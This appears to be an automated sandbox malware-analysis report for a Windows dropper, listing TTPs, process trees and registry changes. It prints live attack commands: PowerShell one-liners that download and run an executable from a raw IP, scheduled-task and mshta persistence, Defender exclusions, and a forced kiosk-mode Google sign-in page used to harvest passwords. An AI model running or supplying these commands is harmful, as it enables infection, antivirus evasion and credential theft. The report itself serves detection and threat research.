0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a ae09e8f5c6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a ae09e8f5c6.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2972 schtasks.exe 2464 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 2664 rapes.exe 2900 ce4pMzk.exe 2900 ce4pMzk.exe 2900 ce4pMzk.exe 2900 ce4pMzk.exe 772 powershell.exe 772 powershell.exe 772 powershell.exe 1568 TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE 2420 powershell.exe 868 powershell.exe 1928 powershell.exe 992 powershell.exe 992 powershell.exe 992 powershell.exe 2880 483d2fa8a0d53818306efeb32d3.exe 1628 powershell.exe 2788 20b1824b6e.exe 2460 099b641ade.exe 1672 AhFKwnS.exe 1184 ae09e8f5c6.exe 3456 696151d304.exe 1184 ae09e8f5c6.exe 1184 ae09e8f5c6.exe 1184 ae09e8f5c6.exe 1184 ae09e8f5c6.exe 908 784126e897.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 920 f8860f532a.exe 920 f8860f532a.exe 920 f8860f532a.exe 920 f8860f532a.exe 4048 AhFKwnS.exe 6812 v6Oqdnc.exe 6812 v6Oqdnc.exe 7148 OEHBOHk.exe 2892 SplashWin.exe 2776 SplashWin.exe 2776 SplashWin.exe 3368 ce4pMzk.exe 3368 ce4pMzk.exe 3368 ce4pMzk.exe 3368 ce4pMzk.exe 4888 powershell.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 7148 OEHBOHk.exe 4648 ckonftponqgz.exe 4664 powershell.exe 4648 ckonftponqgz.exe 4648 ckonftponqgz.exe 4648 ckonftponqgz.exe 4648 ckonftponqgz.exe 4648 ckonftponqgz.exe 4648 ckonftponqgz.exe 4648 ckonftponqgz.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2776 SplashWin.exe 340 cmd.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeDebugPrivilege 2900 ce4pMzk.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 3040 f995140a63.exe Token: SeDebugPrivilege 1672 AhFKwnS.exe Token: SeDebugPrivilege 1672 AhFKwnS.exe Token: SeDebugPrivilege 4888 taskkill.exe Token: SeDebugPrivilege 5032 taskkill.exe Token: SeDebugPrivilege 3512 taskkill.exe Token: SeDebugPrivilege 2948 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 868 firefox.exe Token: SeDebugPrivilege 868 firefox.exe Token: SeDebugPrivilege 920 f8860f532a.exe Token: SeDebugPrivilege 4048 AhFKwnS.exe Token: SeDebugPrivilege 4048 AhFKwnS.exe Token: SeDebugPrivilege 3368 ce4pMzk.exe Token: SeDebugPrivilege 4888 powershell.exe Token: SeShutdownPrivilege 3220 powercfg.exe Token: SeShutdownPrivilege 3660 powercfg.exe Token: SeShutdownPrivilege 3916 powercfg.exe Token: SeShutdownPrivilege 3872 powercfg.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeShutdownPrivilege 4992 powercfg.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeShutdownPrivilege 5088 powercfg.exe Token: SeShutdownPrivilege 5048 powercfg.exe Token: SeLockMemoryPrivilege 2268 explorer.exe Token: SeDebugPrivilege 5336 powershell.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 1416 7c581e7a04.exe 1416 7c581e7a04.exe 1416 7c581e7a04.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 868 firefox.exe 868 firefox.exe 868 firefox.exe 868 firefox.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 1416 7c581e7a04.exe 1416 7c581e7a04.exe 1416 7c581e7a04.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 868 firefox.exe 868 firefox.exe 868 firefox.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe 4848 1566acddfa.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2412 wrote to memory of 2664 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 31 PID 2412 wrote to memory of 2664 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 31 PID 2412 wrote to memory of 2664 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 31 PID 2412 wrote to memory of 2664 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 31 PID 2664 wrote to memory of 2900 2664 rapes.exe 33 PID 2664 wrote to memory of 2900 2664 rapes.exe 33 PID 2664 wrote to memory of 2900 2664 rapes.exe 33 PID 2664 wrote to memory of 2900 2664 rapes.exe 33 PID 2664 wrote to memory of 1416 2664 rapes.exe 34 PID 2664 wrote to memory of 1416 2664 rapes.exe 34 PID 2664 wrote to memory of 1416 2664 rapes.exe 34 PID 2664 wrote to memory of 1416 2664 rapes.exe 34 PID 1416 wrote to memory of 2892 1416 7c581e7a04.exe 35 PID 1416 wrote to memory of 2892 1416 7c581e7a04.exe 35 PID 1416 wrote to memory of 2892 1416 7c581e7a04.exe 35 PID 1416 wrote to memory of 2892 1416 7c581e7a04.exe 35 PID 1416 wrote to memory of 2988 1416 7c581e7a04.exe 37 PID 1416 wrote to memory of 2988 1416 7c581e7a04.exe 37 PID 1416 wrote to memory of 2988 1416 7c581e7a04.exe 37 PID 1416 wrote to memory of 2988 1416 7c581e7a04.exe 37 PID 2892 wrote to memory of 2972 2892 cmd.exe 38 PID 2892 wrote to memory of 2972 2892 cmd.exe 38 PID 2892 wrote to memory of 2972 2892 cmd.exe 38 PID 2892 wrote to memory of 2972 2892 cmd.exe 38 PID 2988 wrote to memory of 772 2988 mshta.exe 39 PID 2988 wrote to memory of 772 2988 mshta.exe 39 PID 2988 wrote to memory of 772 2988 mshta.exe 39 PID 2988 wrote to memory of 772 2988 mshta.exe 39 PID 772 wrote to memory of 1568 772 powershell.exe 41 PID 772 wrote to memory of 1568 772 powershell.exe 41 PID 772 wrote to memory of 1568 772 powershell.exe 41 PID 772 wrote to memory of 1568 772 powershell.exe 41 PID 2664 wrote to memory of 1872 2664 rapes.exe 42 PID 2664 wrote to memory of 1872 2664 rapes.exe 42 PID 2664 wrote to memory of 1872 2664 rapes.exe 42 PID 2664 wrote to memory of 1872 2664 rapes.exe 42 PID 1872 wrote to memory of 2520 1872 cmd.exe 44 PID 1872 wrote to memory of 2520 1872 cmd.exe 44 PID 1872 wrote to memory of 2520 1872 cmd.exe 44 PID 1872 wrote to memory of 2520 1872 cmd.exe 44 PID 1872 wrote to memory of 2296 1872 cmd.exe 45 PID 1872 wrote to memory of 2296 1872 cmd.exe 45 PID 1872 wrote to memory of 2296 1872 cmd.exe 45 PID 1872 wrote to memory of 2296 1872 cmd.exe 45 PID 2296 wrote to memory of 2420 2296 cmd.exe 46 PID 2296 wrote to memory of 2420 2296 cmd.exe 46 PID 2296 wrote to memory of 2420 2296 cmd.exe 46 PID 2296 wrote to memory of 2420 2296 cmd.exe 46 PID 1872 wrote to memory of 1984 1872 cmd.exe 47 PID 1872 wrote to memory of 1984 1872 cmd.exe 47 PID 1872 wrote to memory of 1984 1872 cmd.exe 47 PID 1872 wrote to memory of 1984 1872 cmd.exe 47 PID 1984 wrote to memory of 868 1984 cmd.exe 48 PID 1984 wrote to memory of 868 1984 cmd.exe 48 PID 1984 wrote to memory of 868 1984 cmd.exe 48 PID 1984 wrote to memory of 868 1984 cmd.exe 48 PID 1872 wrote to memory of 1356 1872 cmd.exe 49 PID 1872 wrote to memory of 1356 1872 cmd.exe 49 PID 1872 wrote to memory of 1356 1872 cmd.exe 49 PID 1872 wrote to memory of 1356 1872 cmd.exe 49 PID 1356 wrote to memory of 1928 1356 cmd.exe 50 PID 1356 wrote to memory of 1928 1356 cmd.exe 50 PID 1356 wrote to memory of 1928 1356 cmd.exe 50 PID 1356 wrote to memory of 1928 1356 cmd.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\CMnYnzVl\Anubis.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe"C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn vkkiemaJdog /tr "mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn vkkiemaJdog /tr "mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2972
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE"C:\Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1568
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "vF9OEmas82S" /tr "mshta \"C:\Temp\OjPpbvgIz.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2464
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\OjPpbvgIz.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe"C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2788 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"4⤵
- Executes dropped EXE
PID:636
-
-
C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"4⤵
- Executes dropped EXE
PID:1912
-
-
C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 10085⤵
- Loads dropped DLL
- Program crash
PID:628
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 5244⤵
- Loads dropped DLL
- Program crash
PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe"C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2460 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:772
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 6404⤵
- Loads dropped DLL
- Program crash
PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe"C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe"C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3456 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 12044⤵
- Loads dropped DLL
- Program crash
PID:3920
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe"C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:908
-
-
C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe"C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4848 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2392
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:868 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.0.275209716\2020563201" -parentBuildID 20221007134813 -prefsHandle 1184 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {797fef6b-1fce-4509-bb02-eab778f2dbf2} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1264 110d5558 gpu6⤵PID:2748
-
-
